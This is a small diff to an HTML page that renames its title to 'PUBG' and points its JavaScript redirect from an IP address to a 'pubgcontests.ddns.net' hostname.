--- a/index.html
+++ b/index.html
@@ -1,12 +1,12 @@
 <!DOCTYPE html>
 <html>
 <head>
-	<title>IGU Meerpur</title>
+	<title>PUBG</title>
 </head>
 <body>
 	Yes this website is working.
 	<script type="text/javascript">
-    		window.location.href = "http://13.232.50.157";
+    		window.location.href = "http://pubgcontests.ddns.net";
 	</script>
 
 </body>
